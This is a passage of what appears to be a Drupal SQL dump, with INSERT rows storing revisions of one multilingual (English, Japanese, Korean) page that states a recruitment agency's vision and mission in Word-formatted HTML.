위해.</strong><br><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 280, 'en', 0, '<img data-entity-uuid=\"eb1819b4-b6f8-4bed-8ab0-49e296d0329e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121602.png\" width=\"100%\" data-align=\"center\"><blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><p>&nbsp;</p><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 280, 'ja', 0, '<img src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_2.jpg\" data-align=\"left\" data-entity-uuid=\"660bf351-a3d0-4bc7-9799-6b728a87a97e\" data-entity-type=\"file\" width=\"29.26%\"><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\"><o:p></o:p></p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 280, 'ko', 0, '<img src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_3.jpg\" data-align=\"left\" data-entity-uuid=\"3977704f-ae01-480d-96a0-4d4a5102b194\" data-entity-type=\"file\" alt=\"\" width=\"29.98%\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p><strong>대행사와 고객 간의 상호, 존중, 정직, 신뢰로 오래 지속되는 관계를 구축하기 .</strong><br><strong>다른 대행사에 비하면 고객들이 선호하는 선두 에이전시 되기 위해.</strong><br><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 281, 'en', 0, '<img data-entity-uuid=\"eb1819b4-b6f8-4bed-8ab0-49e296d0329e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121602.png\" width=\"100%\" data-align=\"center\"><blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><p>&nbsp;</p><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 281, 'ja', 0, '<img data-entity-uuid=\"162d5d49-d7ff-4897-a907-f001fe3afb63\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121602_0.png\" width=\"100%\" data-align=\"center\"><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\"><o:p></o:p></p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 281, 'ko', 0, '<img src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_3.jpg\" data-align=\"left\" data-entity-uuid=\"3977704f-ae01-480d-96a0-4d4a5102b194\" data-entity-type=\"file\" alt=\"\" width=\"29.98%\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p><strong>대행사와 고객 간의 상호, 존중, 정직, 신뢰로 오래 지속되는 관계를 구축하기 .</strong><br><strong>다른 대행사에 비하면 고객들이 선호하는 선두 에이전시 되기 위해.</strong><br><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 282, 'en', 0, '<img data-entity-uuid=\"eb1819b4-b6f8-4bed-8ab0-49e296d0329e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121602.png\" width=\"100%\" data-align=\"center\"><blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><p>&nbsp;</p><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 25, 282, 'ja', 0, '<img data-entity-uuid=\"162d5d49-d7ff-4897-a907-f001fe3afb63\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121602_0.png\" width=\"100%\" data-align=\"center\"><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\"><o:p></o:p></p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 282, 'ko', 0, '<img data-entity-uuid=\"e07c5eba-fca1-4d18-83b7-a8aa8d8b75ed\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121602_1.png\" width=\"100%\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p><strong>대행사와 고객 간의 상호, 존중, 정직, 신뢰로 오래 지속되는 관계를 구축하기 .</strong><br><strong>다른 대행사에 비하면 고객들이 선호하는 선두 에이전시 되기 위해.</strong><br><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 283, 'en', 0, '<img data-entity-uuid=\"eb1819b4-b6f8-4bed-8ab0-49e296d0329e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121602.png\" width=\"100%\" data-align=\"center\"><blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><p>&nbsp;</p><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 283, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121922_0.png\" data-align=\"left\" data-entity-uuid=\"0139e778-f800-4211-bab2-241a3161a010\" data-entity-type=\"file\" width=\"30.5%\"><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121902.png\" data-align=\"left\" data-entity-uuid=\"3b9565a8-e5ea-426b-927b-4ef6b8f0deb1\" data-entity-type=\"file\" width=\"30.39%\"><p class=\"MsoNormal\"><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 283, 'ko', 0, '<img data-entity-uuid=\"e07c5eba-fca1-4d18-83b7-a8aa8d8b75ed\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121602_1.png\" width=\"100%\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun 